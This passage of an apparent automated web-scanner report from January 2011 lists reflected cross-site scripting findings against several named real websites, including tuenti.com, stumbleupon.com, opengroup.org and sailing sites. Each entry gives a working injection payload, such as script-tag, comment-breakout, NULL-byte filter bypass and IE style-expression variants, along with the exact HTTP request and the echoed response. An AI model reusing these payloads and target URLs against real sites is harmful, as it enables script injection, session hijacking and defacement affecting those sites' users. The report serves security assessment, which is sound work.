The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f3b5"><script>alert(1)</script>10ac75364ee was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/actualite7f3b5"><script>alert(1)</script>10ac75364ee/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Thu, 20 Jan 2011 00:45:17 GMT
Server: Apache
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web12; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<!-- inclusion de la gestion des channel
...[SNIP]...
<a href="/es/actualite7f3b5"><script>alert(1)</script>10ac75364ee/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072">
...[SNIP]...

3.22. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonaworldrace.org
Path:   /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd18a"><script>alert(1)</script>a1caa06401 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/actualite/brevesdd18a"><script>alert(1)</script>a1caa06401/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Thu, 20 Jan 2011 00:45:18 GMT
Server: Apache
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web11; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<!-- inclusion de la gestion des channel
...[SNIP]...
<a href="/es/actualite/brevesdd18a"><script>alert(1)</script>a1caa06401/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072">
...[SNIP]...

3.23. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonaworldrace.org
Path:   /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 43a5a--><script>alert(1)</script>e94251ccb77 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/actualite/breves/detail43a5a--><script>alert(1)</script>e94251ccb77/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Thu, 20 Jan 2011 00:45:20 GMT
Server: Apache
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web10; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<!-- inclusion de la gestion des channel
...[SNIP]...
<!-- /en/actualite/breves/ VS /en/actualite/breves/detail43a5a--><script>alert(1)</script>e94251ccb77/ =>
...[SNIP]...

3.24. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonaworldrace.org
Path:   /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 971b0"><script>alert(1)</script>e6293bdbb82 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/actualite/breves/detail971b0"><script>alert(1)</script>e6293bdbb82/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Thu, 20 Jan 2011 00:45:20 GMT
Server: Apache
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web10; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<!-- inclusion de la gestion des channel
...[SNIP]...
<a href="/es/actualite/breves/detail971b0"><script>alert(1)</script>e6293bdbb82/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072">
...[SNIP]...

3.25. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonaworldrace.org
Path:   /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55fb9"><script>alert(1)</script>bbeb226c99d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-807255fb9"><script>alert(1)</script>bbeb226c99d HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Thu, 20 Jan 2011 00:45:22 GMT
Server: Apache
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web12; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<!-- inclusion de la gestion des channel
...[SNIP]...
<a href="/es/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-807255fb9"><script>alert(1)</script>bbeb226c99d">
...[SNIP]...

3.26. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonaworldrace.org
Path:   /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99434"><script>alert(1)</script>13356a1850f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072?99434"><script>alert(1)</script>13356a1850f=1 HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 20 Jan 2011 00:45:10 GMT
Server: Apache
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web11; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<!-- inclusion de la gestion des channel
...[SNIP]...
<a href="/es/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072?99434"><script>alert(1)</script>13356a1850f=1">
...[SNIP]...

3.27. http://www.beneteaucountdown.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beneteaucountdown.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a28b5"><script>alert(1)</script>18006edac7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a28b5\"><script>alert(1)</script>18006edac7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?a28b5"><script>alert(1)</script>18006edac7b=1 HTTP/1.1
Host: www.beneteaucountdown.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:45:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=be1b4aa144ff8fe0e16b7f74697ace01; path=/
Expires:
Cache-Control:
Pragma:
Set-Cookie: BBF_Login=deleted; expires=Wed, 20-Jan-2010 00:45:09 GMT
Connection: close
Content-Type: text/html; charset=windows-1252
Content-Length: 21898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<form name="BrochureRequest" action="index.php?a28b5\"><script>alert(1)</script>18006edac7b=1&amp;ccsForm=BrochureRequest" method="post">
...[SNIP]...

3.28. http://www.bymnews.com/news/newsList.php [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bymnews.com
Path:   /news/newsList.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00993e4"><script>alert(1)</script>a3764319929 was submitted in the cat parameter. This input was echoed as 993e4\"><script>alert(1)</script>a3764319929 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /news/newsList.php?cat=2%00993e4"><script>alert(1)</script>a3764319929 HTTP/1.1
Host: www.bymnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:45:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 50802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Cont
...[SNIP]...
<a class="readonbym" href="newsList.php?cat=2\0993e4\"><script>alert(1)</script>a3764319929&amp;page=2">
...[SNIP]...

3.29. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /onlinepubs/009629399/apdxa.htm

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 325e2<script>alert(1)</script>bd2a273b0b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /onlinepubs325e2<script>alert(1)</script>bd2a273b0b1/009629399/apdxa.htm HTTP/1.1
Host: www.opengroup.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 20 Jan 2011 00:50:23 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 4266

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/onlinepubs325e2<script>alert(1)</script>bd2a273b0b1/009629399/apdxa.htm<br>
...[SNIP]...

3.30. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /onlinepubs/009629399/apdxa.htm

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload e9577--><script>alert(1)</script>c9731df4bc1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /onlinepubse9577--><script>alert(1)</script>c9731df4bc1/009629399/apdxa.htm HTTP/1.1
Host: www.opengroup.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 20 Jan 2011 00:50:25 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 4272

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /onlinepubse9577--><script>alert(1)</script>c9731df4bc1/009629399/apdxa.htm -->
...[SNIP]...

3.31. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /onlinepubs/009629399/apdxa.htm

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e900a<script>alert(1)</script>bb50ef10f66 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /onlinepubs/009629399e900a<script>alert(1)</script>bb50ef10f66/apdxa.htm HTTP/1.1
Host: www.opengroup.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 20 Jan 2011 00:50:30 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 4266

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/onlinepubs/009629399e900a<script>alert(1)</script>bb50ef10f66/apdxa.htm<br>
...[SNIP]...

3.32. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /onlinepubs/009629399/apdxa.htm

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 8440e--><script>alert(1)</script>525d718c1d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /onlinepubs/0096293998440e--><script>alert(1)</script>525d718c1d7/apdxa.htm HTTP/1.1
Host: www.opengroup.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 20 Jan 2011 00:50:32 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 4272

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /onlinepubs/0096293998440e--><script>alert(1)</script>525d718c1d7/apdxa.htm -->
...[SNIP]...

3.33. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /onlinepubs/009629399/apdxa.htm

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cb23c<script>alert(1)</script>f1cdaa4a54a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /onlinepubs/009629399/apdxa.htmcb23c<script>alert(1)</script>f1cdaa4a54a HTTP/1.1
Host: www.opengroup.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 20 Jan 2011 00:50:36 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 4266

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/onlinepubs/009629399/apdxa.htmcb23c<script>alert(1)</script>f1cdaa4a54a<br>
...[SNIP]...

3.34. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /onlinepubs/009629399/apdxa.htm

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 12c6e--><script>alert(1)</script>401b79155a5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /onlinepubs/009629399/apdxa.htm12c6e--><script>alert(1)</script>401b79155a5 HTTP/1.1
Host: www.opengroup.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 20 Jan 2011 00:50:38 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 4272

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /onlinepubs/009629399/apdxa.htm12c6e--><script>alert(1)</script>401b79155a5 -->
...[SNIP]...

3.35. http://www.sailinganarchy.com/article_submission.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sailinganarchy.com
Path:   /article_submission.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33633"><script>alert(1)</script>e31b4d359f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /article_submission.php/33633"><script>alert(1)</script>e31b4d359f HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=140109105.1295482420.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140109105.1341788743.1295482420.1295482420.1295482420.1; __utmc=140109105; __qca=P0-287484067-1295482430152; __utmb=140109105.2.10.1295482420;

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:24:08 GMT
Server: Apache
Vary: User-Agent
Content-Length: 4013
Connection: close
Content-Type: text/html

<html>
<head>
<title>Article Submission</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/css/SA_CSS.css" rel="stylesheet" type="text/css">
<link href="/css
...[SNIP]...
<form name="Mail" enctype="multipart/form-data" method="post" action="/article_submission.php/33633"><script>alert(1)</script>e31b4d359f">
...[SNIP]...

3.36. http://www.stumbleupon.com/submit [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /submit

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 324c3"style%3d"x%3aexpression(alert(1))"62d09b53079 was submitted in the url parameter. This input was echoed as 324c3"style="x:expression(alert(1))"62d09b53079 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /submit?url=http://blip.tv/file/4639878324c3"style%3d"x%3aexpression(alert(1))"62d09b53079&name=file HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=7uq02l81u9vnjk47rb8d4v21k5; path=/; domain=.stumbleupon.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cmf_i=20868528224d37870da13a17.85512699; expires=Sat, 19-Feb-2011 00:51:25 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_spr=A%2FN; expires=Sat, 19-Feb-2011 00:51:25 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2Fsubmit; expires=Sat, 19-Feb-2011 00:51:25 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: su_c=c496c4c580ae0340b0e0c108595a73d4%7C%7C10%7C%7C1295484685%7C4666508fd41d7fc3999dd8047eea63af; expires=Sun, 17-Jan-2021 00:51:25 GMT; path=/; domain=.stumbleupon.com
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 49112
Date: Thu, 20 Jan 2011 00:51:25 GMT
X-Varnish: 16870564
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<input type="hidden" name="url" value="http://blip.tv/file/4639878324c3"style="x:expression(alert(1))"62d09b53079" />
...[SNIP]...

3.37. http://www.tuenti.com/share [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tuenti.com
Path:   /share

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28d01"><script>alert(1)</script>bbf652f7ee9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /share?url=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html&28d01"><script>alert(1)</script>bbf652f7ee9=1 HTTP/1.1
Host: www.tuenti.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 2005 04:59:59 GMT
Content-Type: text/html
Set-Cookie: ond=deleted; expires=Wed, 20-Jan-2010 00:51:41 GMT; path=/; domain=.tuenti.com
Set-Cookie: ourl=%3Fm%3DShare%26url%3Dhttp%253A%252F%252Fwww.elmundo.es%252Felmundo%252F2011%252F01%252F17%252Fnautica%252F1295254542.html%26p%3D; path=/; domain=.tuenti.com
Set-Cookie: keep_ru=1; path=/; domain=.tuenti.com
Set-Cookie: ue=deleted; expires=Wed, 20-Jan-2010 00:51:41 GMT; path=/; domain=.tuenti.com
Set-Cookie: em=deleted; expires=Wed, 20-Jan-2010 00:51:41 GMT; path=/; domain=.tuenti.com
Set-Cookie: fa=deleted; expires=Wed, 20-Jan-2010 00:51:41 GMT; path=/; domain=.tuenti.com
Set-Cookie: et=deleted; expires=Wed, 20-Jan-2010 00:51:41 GMT; path=/; domain=.tuenti.com
Connection: close
Date: Thu, 20 Jan 2011 00:51:42 GMT
Content-Length: 41848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" xmlns:fw="http://ww
...[SNIP]...
<form method="post" action="?url=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html&28d01"><script>alert(1)</script>bbf652f7ee9=1" id="lang_form_1">
...[SNIP]...

3.38. http://www.tuenti.com/share [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tuenti.com
Path:   /share

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3749"><script>alert(1)</script>3ddc78bf4c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /share?e3749"><script>alert(1)</script>3ddc78bf4c7=1 HTTP/1.1
Host: www.tuenti.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 2005 04:59:59 GMT
Content-Type: text/html
Connection: close
Date: Thu, 20 Jan 2011 00:51:29 GMT
Content-Length: 39388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" xmlns:fw="http://ww
...[SNIP]...
<form method="post" action="?e3749"><script>alert(1)</script>3ddc78bf4c7=1" id="lang_form_1">
...[SNIP]...

3.39. http://www.tuenti.com/share [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tuenti.com
Path:   /share

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7df6b"><script>alert(1)</script>ac4474858b9 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /share?url=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html7df6b"><script>alert(1)</script>ac4474858b9 HTTP/1.1
Host: www.tuenti.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 2005 04:59:59 GMT
Content-Type: text/html
Connection: close
Date: Thu, 20 Jan 2011 00:51:32 GMT
Content-Length: 39461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" xmlns:fw="http://ww
...[SNIP]...
<form method="post" action="?url=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html7df6b"><script>alert(1)</script>ac4474858b9" id="lang_form_1">
...[SNIP]...

